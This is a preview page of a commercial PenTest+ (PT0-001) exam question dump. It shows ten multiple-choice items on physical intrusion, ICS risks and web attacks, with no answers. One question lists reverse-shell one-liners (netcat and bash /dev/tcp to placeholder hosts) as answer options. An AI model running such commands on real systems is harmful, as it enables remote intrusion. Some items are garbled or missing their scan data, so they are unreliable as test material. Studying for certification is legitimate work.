Exit demo PT0-001 CompTIA PenTest+ PDF format · free preview

CompTIA PT0-001 - Questions & Answers

Free preview · every answer includes a full explanation

Product page: https://prepkeys.com/pt0-001.html

Question 1
Single choice

Which of the following types of intrusion techniques is the use of an "under-the-door tool" during a physical security assessment an example of?

A.

Lockpicking

B.

Egress sensor triggering

C.

Lock bumping

D.

Lock bypass

Question 2
Single choice

Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?

A.

ICS vendors are slow to implement adequate security controls.

B.

ICS staff are not adequately trained to perform basic duties.

C.

There is a scarcity of replacement equipment for critical devices.

D.

There is a lack of compliance for ICS facilities.

Question 3
Single choice

An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling.

Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?

A.

Selection of the appropriate set of security testing tools

B.

Current and load ratings of the ICS components

C.

Potential operational and safety hazards

D.

Electrical certification of hardware used in the test

Question 4
Single choice

Which of the following types of physical security attacks does a mantrap mitigate-?

A.

Lock picking

B.

Impersonation

C.

Shoulder surfing

D.

Tailgating

Question 5
Single choice

A penetration tester wants to target NETBIOS name service.

Which of the following is the most likely command to exploit the NETBIOS name service?

A.

arPspoof

B.

nmap

C.

responder

D.

burpsuite

Question 6
Single choice

A penetration tester compromises a system that has unrestricted network over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker.

Which of the following methods would the penetration tester mostly like use?

A.

perl -e ` use SOCKET'; $i='<SOURCEIP>; $p='443;

B.

ssh superadmin@<DESTINATIONIP> -p 443

C.

nc -e /bin/sh <SOURCEIP> 443

D.

bash -i >& /dev/tcp/<DESTINATIONIP>/ 443 0>&1

Question 7
Single choice

A penetration tester identifies the following findings during an external vulnerability scan:

Which of the following attack strategies should be prioritized from the scan results above?

A.

Obsolete software may contain exploitable components

B.

Weak password management practices may be employed

C.

Cryptographically weak protocols may be intercepted

D.

Web server configurations may reveal sensitive information

Question 8
Single choice

After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the attacker's actual fingerprint without exploitation.

Which of the following is the MOST likely explanation of what happened?

A.

The biometric device is tuned more toward false positives

B.

The biometric device is configured more toward true negatives

C.

The biometric device is set to fail closed

D.

The biometnc device duplicated a valid user's fingerpnnt.

Question 9
Single choice

A penetration tester notices that the X-Frame-Optjons header on a web application is not set.

Which of the following would a malicious actor do to exploit this configuration setting?

A.

Use path modification to escape the application's framework.

B.

Create a frame that overlays the application.

C.

Inject a malicious iframe containing JavaScript.

D.

Pass an iframe attribute that is malicious.

Question 10
Single choice

A financial institution is asking a penetration tester to determine if collusion capabilities to produce wire fraud are present.

Which of the following threat actors should the penetration tester portray during the assessment?

A.

Insider threat

B.

Nation state

C.

Script kiddie

D.

Cybercrime organization.

Showing 10 of 306 questions · Unlock the full set